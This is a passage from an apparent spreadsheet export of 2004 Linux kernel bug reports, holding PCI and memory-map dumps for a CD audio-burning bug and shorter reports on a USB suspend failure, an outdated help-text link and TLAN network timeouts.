000d2000-000d3fff : Adapter ROM 000f0000-000fffff : System ROM 00100000-4ffeffff : System RAM 00100000-0030e92e : Kernel code 0030e92f-003f393f : Kernel data 4fff0000-4fff2fff : ACPI Non-volatile Storage 4fff3000-4fffffff : ACPI Tables e0000000-e3ffffff : 0000:00:00.0 e4000000-e7ffffff : PCI Bus #02 e4000000-e7ffffff : 0000:02:00.0 e8000000-e9ffffff : PCI Bus #02 e8000000-e8ffffff : 0000:02:00.0 e8000000-e8ffffff : nvidia ea000000-eaffffff : PCI Bus #01 eb000000-eb000fff : 0000:00:04.0 eb000000-eb000fff : forcedeth eb001000-eb001fff : 0000:00:06.0 eb001000-eb0011ff : NVidia nForce2 - AC'97 eb002000-eb002fff : 0000:00:02.0 eb002000-eb002fff : ohci_hcd eb003000-eb003fff : 0000:00:02.1 eb003000-eb003fff : ohci_hcd eb004000-eb0040ff : 0000:00:02.2 eb004000-eb0040ff : ehci_hcd Intel machine: IOPORTS: 0000-001f : dma1 0020-0021 : pic1 0040-005f : timer 0060-006f : keyboard 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 02f8-02ff : serial 0376-0376 : ide1 0378-037a : parport0 037b-037f : parport0 03c0-03df : vga+ 03f6-03f6 : ide0 03f8-03ff : serial 0cf8-0cff : PCI conf1 4000-407f : 0000:00:1f.0 4060-406f : i8xx TCO 4080-40bf : 0000:00:1f.0 5000-501f : 0000:00:1f.3 c000-c0ff : 0000:02:04.0 c000-c0ff : 8139too d000-d01f : 0000:00:1d.1 d000-d01f : uhci_hcd d400-d41f : 0000:00:1d.2 d400-d41f : uhci_hcd d800-d81f : 0000:00:1d.0 d800-d81f : uhci_hcd e000-e0ff : 0000:00:1f.5 e400-e43f : 0000:00:1f.5 f000-f00f : 0000:00:1f.1 f000-f007 : ide0 f008-f00f : ide1 IOMEM: 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000ca7ff : Video ROM 000f0000-000fffff : System ROM 00100000-3ffeffff : System RAM 00100000-002b8bef : Kernel code 002b8bf0-003c257f : Kernel data 3fff0000-3fff2fff : ACPI Non-volatile Storage 3fff3000-3fffffff : ACPI Tables 40000000-400003ff : 0000:00:1f.1 e0000000-e7ffffff : PCI Bus #01 e0000000-e7ffffff : 0000:01:00.0 e8000000-ebffffff : 0000:00:00.0 ec000000-edffffff : PCI Bus #01 ec000000-ecffffff : 0000:01:00.0 ec000000-ecffffff : nvidia ee000000-ee0000ff : 0000:02:04.0 ee000000-ee0000ff : 8139too ee100000-ee1003ff : 0000:00:1d.7 ee100000-ee1003ff : ehci_hcd ee101000-ee1011ff : 0000:00:1f.5 ee101000-ee1011ff : Intel 82801DB-ICH4 - AC'97 ee102000-ee1020ff : 0000:00:1f.5 ee102000-ee1020ff : Intel 82801DB-ICH4 - Controller fec00000-ffffffff : reserved [7.5.] PCI information ('lspci -vvv' as root) AMD Machine:------------------------------------------------------------------------- 00:00.0 Host bridge: nVidia Corporation nForce2 AGP (different version?) (rev c1) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=64M] Capabilities: [40] AGP version 3.0 Status: RQ=32 Iso- ArqSz=2 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x8 Capabilities: [60] #08 [2001] 00:00.1 RAM memory: nVidia Corporation nForce2 Memory Controller 1 (rev c1) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.2 RAM memory: nVidia Corporation nForce2 Memory Controller 4 (rev c1) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.3 RAM memory: nVidia Corporation nForce2 Memory Controller 3 (rev c1) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.4 RAM memory: nVidia Corporation nForce2 Memory Controller 2 (rev c1) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:00.5 RAM memory: nVidia Corporation nForce2 Memory Controller 5 (rev c1) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:01.0 ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev a3) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [48] #08 [01e1] 00:01.1 SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev a2) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 169 Region 0: I/O ports at ec00 [size=32] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:02.0 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) (prog-if 10 [OHCI]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 177 Region 0: Memory at eb002000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) (prog-if 10 [OHCI]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin B routed to IRQ 185 Region 0: Memory at eb003000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:02.2 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) (prog-if 20 [EHCI]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin C routed to IRQ 193 Region 0: Memory at eb004000 (32-bit, non-prefetchable) [size=256] Capabilities: [44] #0a [2080] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:04.0 Ethernet controller: nVidia Corporation nForce2 Ethernet Controller (rev a1) Subsystem: Micro-Star International Co., Ltd.: Unknown device 570c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (250ns min, 5000ns max) Interrupt: pin A routed to IRQ 177 Region 0: Memory at eb000000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at e000 [size=8] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable+ DSel=0 DScale=0 PME- 00:06.0 Multimedia audio controller: nVidia Corporation nForce2 AC97 Audio Controler (MCP) (rev a1) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (500ns min, 1250ns max) Interrupt: pin A routed to IRQ 185 Region 0: I/O ports at e400 [size=256] Region 1: I/O ports at e800 [size=128] Region 2: Memory at eb001000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:08.0 PCI bridge: nVidia Corporation nForce2 External PCI Bridge (rev a3) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 0000c000-0000dfff Memory behind bridge: ea000000-eaffffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- 00:09.0 IDE interface: nVidia Corporation nForce2 IDE (rev a2) (prog-if 8a [Master SecP PriP]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 5700 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Region 4: I/O ports at f000 [size=16] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev c1) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Bus: primary=00, secondary=02, subordinate=02, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: e8000000-e9ffffff Prefetchable memory behind bridge: e4000000-e7ffffff BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- 01:07.0 SCSI storage controller: Artop Electronic Corp ATP865 (rev 02) Subsystem: Artop Electronic Corp ATP865 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 254 (2750ns min, 1000ns max) Interrupt: pin A routed to IRQ 201 Region 0: I/O ports at c000 [size=8] Region 1: I/O ports at c400 [size=4] Region 2: I/O ports at c800 [size=8] Region 3: I/O ports at cc00 [size=4] Region 4: I/O ports at d000 [size=16] Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] Capabilities: [58] Power Management version 1 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 02:00.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 440 AGP 8x] (rev a2) (prog-if 00 [VGA]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop+ ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 248 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 209 Region 0: Memory at e8000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at e4000000 (32-bit, prefetchable) [size=64M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 3.0 Status: RQ=32 Iso- ArqSz=0 Cal=3 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=32 ArqSz=2 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x8 Intel machine PCI: ------------------------------------------------------------------------- 00:00.0 Host bridge: Intel Corp. 82845G/GL[Brookdale-G]/GE/PE DRAM Controller/Host-Hub Interface (rev 03) Subsystem: Intel Corp. 82845G/GL[Brookdale-G]/GE/PE DRAM Controller/Host-Hub Interface Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e8000000 (32-bit, prefetchable) [size=64M] Capabilities: [e4] #09 [6105] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00:01.0 PCI bridge: Intel Corp. 82845G/GL[Brookdale-G]/GE/PE Host-to-AGP Bridge (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: ec000000-edffffff Prefetchable memory behind bridge: e0000000-e7ffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- 00:1d.0 USB Controller: Intel Corp. 82801DB (ICH4) USB UHCI #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: AOPEN Inc.: Unknown device 02c8 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 169 Region 4: I/O ports at d800 [size=32] 00:1d.1 USB Controller: Intel Corp. 82801DB (ICH4) USB UHCI #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: AOPEN Inc.: Unknown device 02c8 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 177 Region 4: I/O ports at d000 [size=32] 00:1d.2 USB Controller: Intel Corp. 82801DB (ICH4) USB UHCI #3 (rev 02) (prog-if 00 [UHCI]) Subsystem: AOPEN Inc.: Unknown device 02c8 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 185 Region 4: I/O ports at d400 [size=32] 00:1d.7 USB Controller: Intel Corp. 82801DB (ICH4) USB2 EHCI Controller (rev 02) (prog-if 20 [EHCI]) Subsystem: AOPEN Inc.: Unknown device 040a Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 193 Region 0: Memory at ee100000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB/EB/ER Hub interface to PCI Bridge (rev 82) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=32 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: ee000000-ee0fffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity- SERR+ NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corp. 82801DB (ICH4) LPC Bridge (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corp. 82801DB (ICH4) Ultra ATA 100 Storage Controller (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: AOPEN Inc.: Unknown device 02c8 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 185 Region 0: I/O ports at &lt;unassigned&gt; Region 1: I/O ports at &lt;unassigned&gt; Region 2: I/O ports at &lt;unassigned&gt; Region 3: I/O ports at &lt;unassigned&gt; Region 4: I/O ports at f000 [size=16] Region 5: Memory at 40000000 (32-bit, non-prefetchable) [size=1K] 00:1f.3 SMBus: Intel Corp. 82801DB/DBM (ICH4) SMBus Controller (rev 02) Subsystem: AOPEN Inc.: Unknown device 02c8 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 201 Region 4: I/O ports at 5000 [size=32] 00:1f.5 Multimedia audio controller: Intel Corp. 82801DB (ICH4) AC'97 Audio Controller (rev 02) Subsystem: AOPEN Inc.: Unknown device 0225 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 201 Region 0: I/O ports at e000 [size=256] Region 1: I/O ports at e400 [size=64] Region 2: Memory at ee101000 (32-bit, non-prefetchable) [size=512] Region 3: Memory at ee102000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: nVidia Corporation NV11DDR [GeForce2 MX 100 DDR/200 DDR] (rev b2) (prog-if 00 [VGA]) Subsystem: VISIONTEK: Unknown device 002c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 169 Region 0: Memory at ec000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at e0000000 (32-bit, prefetchable) [size=128M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA- ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 02:04.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: AOPEN Inc.: Unknown device 0180 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (8000ns min, 16000ns max) Interrupt: pin A routed to IRQ 209 Region 0: I/O ports at c000 [size=256] Region 1: Memory at ee000000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- [7.6.] SCSI information (from /proc/scsi/scsi) AMD and Intel both show no attached devices. [7.7.] Other information that might be relevant to the problem AMD machine Cd Burner on ide1 secondary settings: name value min max mode ---- ----- --- --- ---- acoustic 0 0 254 rw address 0 0 2 rw bios_cyl 25038 0 65535 rw bios_head 16 0 255 rw bios_sect 63 0 63 rw bswap 0 0 1 r current_speed 66 0 70 rw failures 0 0 65535 rw init_speed 66 0 70 rw io_32bit 0 0 3 rw keepsettings 0 0 1 rw lun 0 0 7 rw max_failures 1 0 65535 rw multcount 16 0 16 rw nice1 1 0 1 rw nowerr 0 0 1 rw number 0 0 3 rw pio_mode write-only 0 255 w unmaskirq 0 0 1 rw using_dma 1 0 1 rw wcache 0 0 1 rw Intel machine Cd Burner on ide1 secondary settings: name value min max mode ---- ----- --- --- ---- current_speed 66 0 70 rw dsc_overlap 1 0 1 rw ide-scsi 0 0 1 rw init_speed 66 0 70 rw io_32bit 0 0 3 rw keepsettings 0 0 1 rw nice1 1 0 1 rw number 3 0 3 rw pio_mode write-only 0 255 w unmaskirq 0 0 1 rw using_dma 1 0 1 rw [8.] Other notes, patches, fixes, workarounds: Very Important: I have applied the patch from this link: http://kerneltrap.org/node/view/3659 This was to BOTH the AMD and the Intel Computers. It did not make any difference. Creating audio still produces the "modem" sounds instead of the correct format. Neither machine experienced the "slow" down as reported here, either before or after applying the patch.</t>
  </si>
  <si>
    <t>2.6.9-rc1</t>
  </si>
  <si>
    <t>USB OHCI fails to suspend</t>
  </si>
  <si>
    <t>2004-08-25 14:51 UTC</t>
  </si>
  <si>
    <t>2005-01-10 22:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10 Hardware Environment: Toshiba Satellite Pro 6000 Software Environment: all 2.6.x kernels, including 2.6.9-rc1 Problem Description: The USB controller (Ali USB 1.1 controller, ohci driver) of this laptop fails to suspend, regardless of any USB device attached to one of the ports. When trying to suspend, the laptop seems to go down, but reawakes immediately. In dmesg I see the next lines appear : Aug 24 18:31:58 porty kernel: Stopping tasks: ==============================================| Aug 24 18:31:58 porty kernel: usbhid 1-1:1.0: resume is unsafe! Aug 24 18:31:58 porty kernel: usb 1-1: control timeout on ep0out Aug 24 18:31:58 porty kernel: Could not suspend device 0000:00:02.0: error -5 Aug 24 18:31:58 porty kernel: ACPI: PCI interrupt 0000:00:04.0[A]: no GSI Aug 24 18:31:58 porty kernel: hub 1-0:1.0: reactivate --&gt; -22 Aug 24 18:31:58 porty kernel: hub 1-0:1.0: reactivate --&gt; -22 Aug 24 18:31:58 porty kernel: Restarting tasks... done The USB drivers are compiled as modules, the problem happens always when the drivers are loaded. Steps to reproduce: - boot laptop with USB drivers loaded - try to suspend the laptop (echo "mem" &gt; /sys/power/state) - see how it fails to suspend Fix so far : rmmod all USB modules prior to suspend, hotplug will reload them on resume. Needless to say, it would be nice if this could be solved. Thx in advance.</t>
  </si>
  <si>
    <t>Missing include statements</t>
  </si>
  <si>
    <t>2004-08-26 05:55 UTC</t>
  </si>
  <si>
    <t>2004-09-01 12:57 UTC</t>
  </si>
  <si>
    <t>BSD Process Accounting version 3 file format</t>
  </si>
  <si>
    <t>2004-08-26 14:37 UTC</t>
  </si>
  <si>
    <t>2004-08-26 15:08 UTC</t>
  </si>
  <si>
    <t>In the BSD Process Accounting version 3 file format help text there is a reference to &lt;http://http://www.de.kernel.org/pub/linux/utils/acct/&gt;. This location doesn't exists anymore. I could still find the software in this location. http://www.physik3.uni-rostock.de/tim/kernel/utils/acct/</t>
  </si>
  <si>
    <t>Thomas Gleixner</t>
  </si>
  <si>
    <t>2.6.8-1</t>
  </si>
  <si>
    <t>2004-08-29 05:46 UTC</t>
  </si>
  <si>
    <t>Juhamatti Nikander</t>
  </si>
  <si>
    <t>2007-11-02 09:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: motherboard = epox 8kha+ cpu = amd athlon xp 1900+ hard disk = maxtor 6E020L0 network adapter = Compaq Netelligent 10/100 TX PCI UTP display adapter = Nvidia GeForce 2 ram = kingston 512MB ddr 266 Software Environment: cat /proc/version Linux version 2.6.8-1-k7 (dilinger@toaster.hq.voxel.net) (gcc version 3.3.4 (Debian 1:3.3.4-7)) #1 Mon Aug 16 03:29:20 EDT 2004 Problem Description: After a heavy network load and a random period of time, kernel reports a message: "kernel: TLAN: Received interrupt for uncompleted RX frame." "kernel: NETDEV WATCHDOG: eth0: transmit timed out" "kernel: TLAN: eth0: Starting autonegotiation." "kernel: TLAN: eth0: Autonegotiation complete." "kernel: TLAN: eth0: Link active with AutoNegotiation enabled, at 100Mbps Full- Duplex" And after that, network doesn't work. Only thing you can do, is to ping localhost 127.0.0.1 and adapter eth0 192.168.0.4 (in my case). Still net link is up and lights are on on my switch. It doesn't change route list. Only workaround to this weird problem is to rmmod tlan and insmod it again 